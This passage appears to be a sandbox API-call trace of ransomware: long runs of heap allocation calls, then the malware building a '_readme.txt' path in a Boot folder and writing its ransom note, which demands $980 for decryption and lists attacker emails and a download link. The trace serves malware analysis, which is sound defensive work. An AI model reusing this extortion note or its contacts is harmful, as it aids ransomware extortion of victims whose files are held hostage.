| out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.598] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0228.598] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.598] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.598] PathFindFileNameW (pszPath="") returned="" [0228.598] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.599] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.599] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.599] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.599] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.599] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0228.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.600] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.600] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your 